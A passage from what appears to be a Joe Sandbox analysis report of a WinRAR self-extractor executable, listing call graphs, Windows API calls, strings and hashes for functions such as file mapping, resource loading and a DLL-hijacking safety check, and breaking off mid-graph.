24583 37d3ab 24581->24583 24584 37d394 24582->24584 24622 3799b0 24583->24622 24584->24583 24586 37d407 24633 395a90 26 API calls 3 library calls 24586->24633 24587 379653 79 API calls 24590 37d7ab 24587->24590 24588 383781 76 API calls 24591 37d3db 24588->24591 24590->24529 24591->24586 24591->24588 24604 37d627 24591->24604 24592 37d41a 24634 395a90 26 API calls 3 library calls 24592->24634 24594 37d563 24594->24604 24652 379d30 77 API calls 24594->24652 24598 37d57d new 24599 379bf0 80 API calls 24598->24599 24598->24604 24602 37d5a6 new 24599->24602 24601 37d42c 24601->24594 24601->24604 24635 379e40 24601->24635 24643 379bf0 24601->24643 24651 379d30 77 API calls 24601->24651 24602->24604 24618 37d5b2 new 24602->24618 24653 38137a MultiByteToWideChar 24602->24653 24604->24587 24605 37d72b 24654 37ce72 76 API calls 24605->24654 24607 37da0a 24659 37ce72 76 API calls 24607->24659 24609 37d9fa 24609->24529 24610 37d771 24655 395a90 26 API calls 3 library calls 24610->24655 24612 37d742 24612->24610 24614 383781 76 API calls 24612->24614 24613 37d78b 24656 395a90 26 API calls 3 library calls 24613->24656 24614->24612 24616 381596 WideCharToMultiByte 24616->24618 24618->24604 24618->24605 24618->24607 24618->24609 24618->24616 24657 37dd6b 50 API calls __vsnprintf 24618->24657 24658 3958d9 26 API calls 3 library calls 24618->24658 24621 37d32f 24620->24621 24621->24532 24623 3799ba 24622->24623 24624 379a39 CreateFileW 24623->24624 24625 379aaa 24624->24625 24626 379a59 GetLastError 24624->24626 24627 379ae1 24625->24627 24629 379ac7 SetFileTime 24625->24629 24628 37b66c 2 API calls 24626->24628 24627->24591 24630 379a79 24628->24630 24629->24627 24630->24625 24631 379a7d CreateFileW GetLastError 24630->24631 24632 379aa1 24631->24632 24632->24625 24633->24592 24634->24601 24636 379e64 SetFilePointer 24635->24636 24638 379e53 24635->24638 24637 379e9d 24636->24637 24639 379e82 GetLastError 24636->24639 24637->24601 24638->24637 24660 376fa5 75 API calls 24638->24660 24639->24637 24640 379e8c 24639->24640 24640->24637 24661 376fa5 75 API calls 24640->24661 24644 379bfc 24643->24644 24647 379c03 24643->24647 24644->24601 24646 379c9e 24646->24644 24674 376f6b 75 API calls 24646->24674 24647->24644 24647->24646 24649 379cc0 24647->24649 24662 37984e 24647->24662 24649->24644 24650 37984e 5 API calls 24649->24650 24650->24649 24651->24601 24652->24598 24653->24618 24654->24612 24655->24613 24656->24604 24657->24618 24658->24618 24659->24609 24660->24636 24661->24637 24663 379867 ReadFile 24662->24663 24664 37985c GetStdHandle 24662->24664 24665 379880 24663->24665 24666 3798a0 24663->24666 24664->24663 24667 379989 GetFileType 24665->24667 24666->24647 24668 379887 24667->24668 24669 379895 24668->24669 24670 3798b7 24668->24670 24671 3798a8 GetLastError 24668->24671 24673 37984e GetFileType 24669->24673 24670->24666 24672 3798c7 GetLastError 24670->24672 24671->24666 24671->24670 24672->24666 24672->24669 24673->24666 24674->24644 24676 397430 IsInExceptionSpec 24675->24676 24677 397448 24676->24677 24678 39757e _abort GetModuleHandleW 24676->24678 24697 39a3f1 EnterCriticalSection 24677->24697 24680 39743c 24678->24680 24680->24677 24709 3975c2 GetModuleHandleExW 24680->24709 24681 3974ee 24698 39752e 24681->24698 24684 3974c5 24688 3974dd 24684->24688 24692 3981f1 _abort 5 API calls 24684->24692 24686 39750b 24701 39753d 24686->24701 24687 397537 24718 3a1a19 5 API calls DloadUnlock 24687->24718 24693 3981f1 _abort 5 API calls 24688->24693 24692->24688 24693->24681 24694 397450 24694->24681 24694->24684 24717 397f30 20 API calls _abort 24694->24717 24697->24694 24719 39a441 LeaveCriticalSection 24698->24719 24700 397507 24700->24686 24700->24687 24720 39a836 24701->24720 24704 39756b 24707 3975c2 _abort 8 API calls 24704->24707 24705 39754b GetPEB 24705->24704 24706 39755b GetCurrentProcess TerminateProcess 24705->24706 24706->24704 24708 397573 ExitProcess 24707->24708 24710 3975ec GetProcAddress 24709->24710 24711 39760f 24709->24711 24714 397601 24710->24714 24712 39761e 24711->24712 24713 397615 FreeLibrary 24711->24713 24715 38ec4a DloadUnlock 5 API calls 24712->24715 24713->24712 24714->24711 24716 397628 24715->24716 24716->24677 24717->24684 24719->24700 24721 39a85b 24720->24721 24725 39a851 24720->24725 24722 39a458 _free 5 API calls 24721->24722 24722->24725 24723 38ec4a DloadUnlock 5 API calls 24724 397547 24723->24724 24724->24704 24724->24705 24725->24723 24789 38eac0 27 API calls pre_c_initialization 24835 39ebc1 21 API calls __vsnwprintf_l 24836 3897c0 10 API calls 24791 399ec0 21 API calls 24837 39b5c0 GetCommandLineA GetCommandLineW 24792 38a8c2 GetDlgItem EnableWindow ShowWindow SendMessageW

                          Executed Functions

                          Function 0038D5D4 Relevance: 42.2, APIs: 17, Strings: 7, Instructions: 197filesleeptimeCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                            • Part of subcall function 003800CF: GetModuleHandleW.KERNEL32(kernel32), ref: 003800E4
                            • Part of subcall function 003800CF: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 003800F6
                            • Part of subcall function 003800CF: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00380127
                            • Part of subcall function 00389DA4: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00389DAC
                            • Part of subcall function 0038A335: OleInitialize.OLE32(00000000), ref: 0038A34E
                            • Part of subcall function 0038A335: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0038A385
                            • Part of subcall function 0038A335: SHGetMalloc.SHELL32(003B8430), ref: 0038A38F
                            • Part of subcall function 003813B3: GetCPInfo.KERNEL32(00000000,?), ref: 003813C4
                            • Part of subcall function 003813B3: IsDBCSLeadByte.KERNEL32(00000000), ref: 003813D8
                          • GetCommandLineW.KERNEL32 ref: 0038D61C
                          • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0038D643
                          • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 0038D654
                          • UnmapViewOfFile.KERNEL32(00000000), ref: 0038D68E
                            • Part of subcall function 0038D287: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0038D29D
                            • Part of subcall function 0038D287: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0038D2D9
                          • CloseHandle.KERNEL32(00000000), ref: 0038D697
                          • GetModuleFileNameW.KERNEL32(00000000,003CDC90,00000800), ref: 0038D6B2
                          • SetEnvironmentVariableW.KERNEL32(sfxname,003CDC90), ref: 0038D6BE
                          • GetLocalTime.KERNEL32(?), ref: 0038D6C9
                          • _swprintf.LIBCMT ref: 0038D708
                          • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0038D71A
                          • GetModuleHandleW.KERNEL32(00000000), ref: 0038D721
                          • LoadIconW.USER32(00000000,00000064), ref: 0038D738
                          • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001AEE0,00000000), ref: 0038D789
                          • Sleep.KERNEL32(?), ref: 0038D7B7
                          • DeleteObject.GDI32 ref: 0038D7F0
                          • DeleteObject.GDI32(?), ref: 0038D800
                          • CloseHandle.KERNEL32 ref: 0038D843
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                          • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp$xj<
                          • API String ID: 788466649-836959916
                          • Opcode ID: cd8e61b7f5e759091883623fa2904b420b7dfdfaa55e33ddd7b6ddef774763a1
                          • Instruction ID: fdef71fbdeb418e620256c1a77eadafa502393bdb8b741d0c651895b7d948c21
                          • Opcode Fuzzy Hash: cd8e61b7f5e759091883623fa2904b420b7dfdfaa55e33ddd7b6ddef774763a1
                          • Instruction Fuzzy Hash: 9B61CF71900341AFD323BBA6EC4AF6B77ACAB46744F000569F645D62A1DBB8DD04C762
                          Function 00389E1C Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 100memorywindowCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 770 389e1c-389e38 FindResourceW 771 389e3e-389e50 SizeofResource 770->771 772 389f2f-389f32 770->772 773 389e70-389e72 771->773 774 389e52-389e61 LoadResource 771->774 775 389f2e 773->775 774->773 776 389e63-389e6e LockResource 774->776 775->772 776->773 777 389e77-389e8c GlobalAlloc 776->777 778 389f28-389f2d 777->778 779 389e92-389e9b GlobalLock 777->779 778->775 780 389f21-389f22 GlobalFree 779->780 781 389ea1-389ebf call 38f4b0 CreateStreamOnHGlobal 779->781 780->778 784 389f1a-389f1b GlobalUnlock 781->784 785 389ec1-389ee3 call 389d7b 781->785 784->780 785->784 790 389ee5-389eed 785->790 791 389f08-389f16 790->791 792 389eef-389f03 GdipCreateHBITMAPFromBitmap 790->792 791->784 792->791 793 389f05 792->793 793->791
                          APIs
                          • FindResourceW.KERNEL32(0038AE4D,PNG,?,?,?,0038AE4D,00000066), ref: 00389E2E
                          • SizeofResource.KERNEL32(00000000,00000000,?,?,?,0038AE4D,00000066), ref: 00389E46
                          • LoadResource.KERNEL32(00000000,?,?,?,0038AE4D,00000066), ref: 00389E59
                          • LockResource.KERNEL32(00000000,?,?,?,0038AE4D,00000066), ref: 00389E64
                          • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0038AE4D,00000066), ref: 00389E82
                          • GlobalLock.KERNEL32(00000000), ref: 00389E93
                          • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00389EB7
                          • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00389EFC
                          • GlobalUnlock.KERNEL32(00000000), ref: 00389F1B
                          • GlobalFree.KERNEL32(00000000), ref: 00389F22
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: Global$Resource$CreateLock$AllocBitmapFindFreeFromGdipLoadSizeofStreamUnlock
                          • String ID: PNG
                          • API String ID: 3656887471-364855578
                          • Opcode ID: 33149037c8e362d0ee23566adc5efdbe7b42d363ab6b76a34216cd91a5296b48
                          • Instruction ID: 0d7da0f30de3db31ece9b0b335eb68843c4193b4672356b0cdc836c7e6de270a
                          • Opcode Fuzzy Hash: 33149037c8e362d0ee23566adc5efdbe7b42d363ab6b76a34216cd91a5296b48
                          • Instruction Fuzzy Hash: 5C316171204706AFC717AF61DC48A6BBBADFF86752F09456AF906D6260DB31DC00CB61
                          Function 0037A5F4 Relevance: 7.6, APIs: 5, Instructions: 107fileCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 993 37a5f4-37a61f call 38e360 996 37a691-37a69a FindNextFileW 993->996 997 37a621-37a632 FindFirstFileW 993->997 998 37a6b0-37a6b2 996->998 999 37a69c-37a6aa GetLastError 996->999 1000 37a6b8-37a75c call 37fe56 call 37bcfb call 380e19 * 3 997->1000 1001 37a638-37a64f call 37b66c 997->1001 998->1000 1002 37a761-37a774 998->1002 999->998 1000->1002 1008 37a651-37a668 FindFirstFileW 1001->1008 1009 37a66a-37a673 GetLastError 1001->1009 1008->1000 1008->1009 1011 37a675-37a678 1009->1011 1012 37a684 1009->1012 1011->1012 1014 37a67a-37a67d 1011->1014 1015 37a686-37a68c 1012->1015 1014->1012 1017 37a67f-37a682 1014->1017 1015->1002 1017->1015
                          APIs
                          • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0037A4EF,000000FF,?,?), ref: 0037A628
                          • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0037A4EF,000000FF,?,?), ref: 0037A65E
                          • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0037A4EF,000000FF,?,?), ref: 0037A66A
                          • FindNextFileW.KERNEL32(?,?,?,?,?,?,0037A4EF,000000FF,?,?), ref: 0037A692
                          • GetLastError.KERNEL32(?,?,?,?,0037A4EF,000000FF,?,?), ref: 0037A69E
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: FileFind$ErrorFirstLast$Next
                          • String ID:
                          • API String ID: 869497890-0
                          • Opcode ID: cee4c5bf7f9ddfb728af6d3eebc8a485e296cbc38c23cf8efb99405803fb4878
                          • Instruction ID: 399d32a71f6270cf4a350d4480232dc324d1922fab37f19421b479ec0f3e1a24
                          • Opcode Fuzzy Hash: cee4c5bf7f9ddfb728af6d3eebc8a485e296cbc38c23cf8efb99405803fb4878
                          • Instruction Fuzzy Hash: 19416176504641AFC326EF68C884ADEF7ECBF89340F054A2AF59DD3240D778A9548B92
                          Function 0039753D Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • GetCurrentProcess.KERNEL32(00000000,?,00397513,00000000,003ABAD8,0000000C,0039766A,00000000,00000002,00000000), ref: 0039755E
                          • TerminateProcess.KERNEL32(00000000,?,00397513,00000000,003ABAD8,0000000C,0039766A,00000000,00000002,00000000), ref: 00397565
                          • ExitProcess.KERNEL32 ref: 00397577
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: Process$CurrentExitTerminate
                          • String ID:
                          • API String ID: 1703294689-0
                          • Opcode ID: a0069c289496bbfa7ee11b6fce647009ac0d471beb2d8fed35d168e9165e0db5
                          • Instruction ID: 664b44d34eda271049e60b5923b00c41d2013b1886f031fdd6c3b61009b3cf2b
                          • Opcode Fuzzy Hash: a0069c289496bbfa7ee11b6fce647009ac0d471beb2d8fed35d168e9165e0db5
                          • Instruction Fuzzy Hash: 4FE0B631114948ABCF63BF64DD09A493F69EB42741F128414F90A8A262DB35DE42CA90
                          Function 0037857B Relevance: 3.9, APIs: 2, Instructions: 947COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: H_prolog_memcmp
                          • String ID:
                          • API String ID: 3004599000-0
                          • Opcode ID: de8ae9112a917eea009dd12a4a574c25b20bbf4e8aa64780612bd76765385ab6
                          • Instruction ID: cebd76ecdda0d01132600dee415cbdf4104327ac5398d65a3cf400a58e1e9c24
                          • Opcode Fuzzy Hash: de8ae9112a917eea009dd12a4a574c25b20bbf4e8aa64780612bd76765385ab6
                          • Instruction Fuzzy Hash: 64821B70944245AEDF37DF64C889BFABBA9AF05300F09C5BAD94D9F142DB385A44CB60
                          Function 0038AEE0 Relevance: 98.7, APIs: 47, Strings: 9, Instructions: 724COMMON
                          Download Yara Rule
                          APIs
                          • __EH_prolog.LIBCMT ref: 0038AEE5
                            • Part of subcall function 0037130B: GetDlgItem.USER32(00000000,00003021), ref: 0037134F
                            • Part of subcall function 0037130B: SetWindowTextW.USER32(00000000,003A35B4), ref: 00371365
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: H_prologItemTextWindow
                          • String ID: "%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                          • API String ID: 810644672-8108337
                          • Opcode ID: cee121d339b16b390e8d281cbe6c07e7e5308f38191b0700d9a97fba27aa2faa
                          • Instruction ID: 9dcade67cf78d3e5ee199e2f003390b2d210f05d5d1b55d949771b997ccf2c59
                          • Opcode Fuzzy Hash: cee121d339b16b390e8d281cbe6c07e7e5308f38191b0700d9a97fba27aa2faa
                          • Instruction Fuzzy Hash: 2A42C371944345BEEB23BBB09C4AFBFBB7CAB16704F004196F645AA191CB785A44CB21
                          Function 003800CF Relevance: 98.3, APIs: 22, Strings: 34, Instructions: 317libraryfileloaderCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 257 3800cf-3800ee call 38e360 GetModuleHandleW 260 3800f0-380107 GetProcAddress 257->260 261 380154-3803b2 257->261 262 380109-38011f 260->262 263 380121-380131 GetProcAddress 260->263 264 3803b8-3803c3 call 3970dd 261->264 265 380484-3804b3 GetModuleFileNameW call 37bc85 call 37fe56 261->265 262->263 263->261 266 380133-380152 263->266 264->265 274 3803c9-3803fa GetModuleFileNameW CreateFileW 264->274 280 3804b5-3804bf call 37acf5 265->280 266->261 275 380478-38047f CloseHandle 274->275 276 3803fc-38040a SetFilePointer 274->276 275->265 276->275 278 38040c-380429 ReadFile 276->278 278->275 282 38042b-380450 278->282 285 3804cc 280->285 286 3804c1-3804c5 call 380085 280->286 284 38046d-380476 call 37fbd8 282->284 284->275 294 380452-38046c call 380085 284->294 289 3804ce-3804d0 285->289 291 3804ca 286->291 292 3804f2-380518 call 37bcfb GetFileAttributesW 289->292 293 3804d2-3804f0 CompareStringW 289->293 291->289 296 38051a-38051e 292->296 301 380522 292->301 293->292 293->296 294->284 296->280 300 380520 296->300 302 380526-380528 300->302 301->302 303 38052a 302->303 304 380560-380562 302->304 305 38052c-380552 call 37bcfb GetFileAttributesW 303->305 306 380568-38057f call 37bccf call 37acf5 304->306 307 38066f-380679 304->307 312 38055c 305->312 313 380554-380558 305->313 317 380581-3805e2 call 380085 * 2 call 37ddd1 call 37400a call 37ddd1 call 389f35 306->317 318 3805e7-38061a call 37400a AllocConsole 306->318 312->304 313->305 315 38055a 313->315 315->304 324 380667-380669 ExitProcess 317->324 323 38061c-380661 GetCurrentProcessId AttachConsole call 3935b3 GetStdHandle WriteConsoleW Sleep FreeConsole 318->323 318->324 323->324
                          APIs
                          • GetModuleHandleW.KERNEL32(kernel32), ref: 003800E4
                          • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 003800F6
                          • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00380127
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 003803D4
                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003803F0
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00380402
                          • ReadFile.KERNEL32(00000000,?,00007FFE,003A3BA4,00000000), ref: 00380421
                          • CloseHandle.KERNEL32(00000000), ref: 00380479
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0038048F
                          • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 003804E7
                          • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00000000,?,00000800), ref: 00380510
                          • GetFileAttributesW.KERNEL32(?,?,?,00000800), ref: 0038054A
                            • Part of subcall function 00380085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 003800A0
                            • Part of subcall function 00380085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0037EB86,Crypt32.dll,00000000,0037EC0A,?,?,0037EBEC,?,?,?), ref: 003800C2
                          • _swprintf.LIBCMT ref: 003805BE
                          • _swprintf.LIBCMT ref: 0038060A
                            • Part of subcall function 0037400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0037401D
                          • AllocConsole.KERNEL32 ref: 00380612
                          • GetCurrentProcessId.KERNEL32 ref: 0038061C
                          • AttachConsole.KERNEL32(00000000), ref: 00380623
                          • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00380649
                          • WriteConsoleW.KERNEL32(00000000), ref: 00380650
                          • Sleep.KERNEL32(00002710), ref: 0038065B
                          • FreeConsole.KERNEL32 ref: 00380661
                          • ExitProcess.KERNEL32 ref: 00380669
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
                          • String ID: <:$ ?:$(>:$(@:$0A:$4=:$8<:$<?:$@>:$@@:$D=:$DA:$DXGIDebug.dll$P<:$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$T;:$T?:$X>:$X@:$\A:$`=:$dwmapi.dll$kernel32$l<:$p>:$p?:$p@:$uxtheme.dll$x=:$|<:$>:$?:
                          • API String ID: 1201351596-498112073
                          • Opcode ID: b01077788da42f26c5671d361f15781ead2c5a37967755f822267862c7cb18fc
                          • Instruction ID: d0e4a96a5d059093c8d87213790cca6f81be24d067ec36d63dd800f9c7aa72b7
                          • Opcode Fuzzy Hash: b01077788da42f26c5671d361f15781ead2c5a37967755f822267862c7cb18fc
                          • Instruction Fuzzy Hash: 2BD170B5148384ABD337EF50D849B9FBBECEF86704F00491DF6899A140D7B486488F62
                          Function 0038BDF5 Relevance: 31.9, APIs: 14, Strings: 4, Instructions: 429windowCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 406 38bdf5-38be0d call 38e28c call 38e360 411 38ca90-38ca9d 406->411 412 38be13-38be3d call 38aa36 406->412 412->411 415 38be43-38be48 412->415 416 38be49-38be57 415->416 417 38be58-38be6d call 38a6c7 416->417 420 38be6f 417->420 421 38be71-38be86 call 3817ac 420->421 424 38be88-38be8c 421->424 425 38be93-38be96 421->425 424->421 426 38be8e 424->426 427 38ca5c-38ca87 call 38aa36 425->427 428 38be9c 425->428 426->427 427->416 442 38ca8d-38ca8f 427->442 430 38c132-38c134 428->430 431 38bea3-38bea6 428->431 432 38c074-38c076 428->432 433 38c115-38c117 428->433 430->427 435 38c13a-38c141 430->435 431->427 438 38beac-38bf06 call 389da4 call 37b965 call 37a49d call 37a5d7 call 3770bf 431->438 432->427 436 38c07c-38c088 432->436 433->427 434 38c11d-38c12d SetWindowTextW 433->434 434->427 435->427 439 38c147-38c160 435->439 440 38c08a-38c09b call 397168 436->440 441 38c09c-38c0a1 436->441 492 38c045-38c05a call 37a52a 438->492 444 38c168-38c176 call 3935b3 439->444 445 38c162 439->445 440->441 448 38c0ab-38c0b6 call 38ab9a 441->448 449 38c0a3-38c0a9 441->449 442->411 444->427 462 38c17c-38c185 444->462 445->444 453 38c0bb-38c0bd 448->453 449->453 458 38c0c8-38c0e8 call 3935b3 call 3935de 453->458 459 38c0bf-38c0c6 call 3935b3 453->459 480 38c0ea-38c0f1 458->480 481 38c101-38c103 458->481 459->458 466 38c1ae-38c1b1 462->466 467 38c187-38c18b 462->467 469 38c296-38c2a4 call 37fe56 466->469 470 38c1b7-38c1ba 466->470 467->466 472 38c18d-38c195 467->472 490 38c2a6-38c2ba call 3917cb 469->490 474 38c1bc-38c1c1 470->474 475 38c1c7-38c1e2 470->475 472->427 478 38c19b-38c1a9 call 37fe56 472->478 474->469 474->475 493 38c22c-38c233 475->493 494 38c1e4-38c21e 475->494 478->490 487 38c0f8-38c100 call 397168 480->487 488 38c0f3-38c0f5 480->488 481->427 489 38c109-38c110 call 3935ce 481->489 487->481 488->487 489->427 505 38c2bc-38c2c0 490->505 506 38c2c7-38c318 call 37fe56 call 38a8d0 GetDlgItem SetWindowTextW SendMessageW call 3935e9 490->506 510 38bf0b-38bf1f SetFileAttributesW 492->510 511 38c060-38c06f call 37a4b3 492->511 499 38c261-38c284 call 3935b3 * 2 493->499 500 38c235-38c24d call 3935b3 493->500 529 38c220 494->529 530 38c222-38c224 494->530 499->490 534 38c286-38c294 call 37fe2e 499->534 500->499 516 38c24f-38c25c call 37fe2e 500->516 505->506 512 38c2c2-38c2c4 505->512 540 38c31d-38c321 506->540 517 38bfc5-38bfd5 GetFileAttributesW 510->517 518 38bf25-38bf58 call 37b4f7 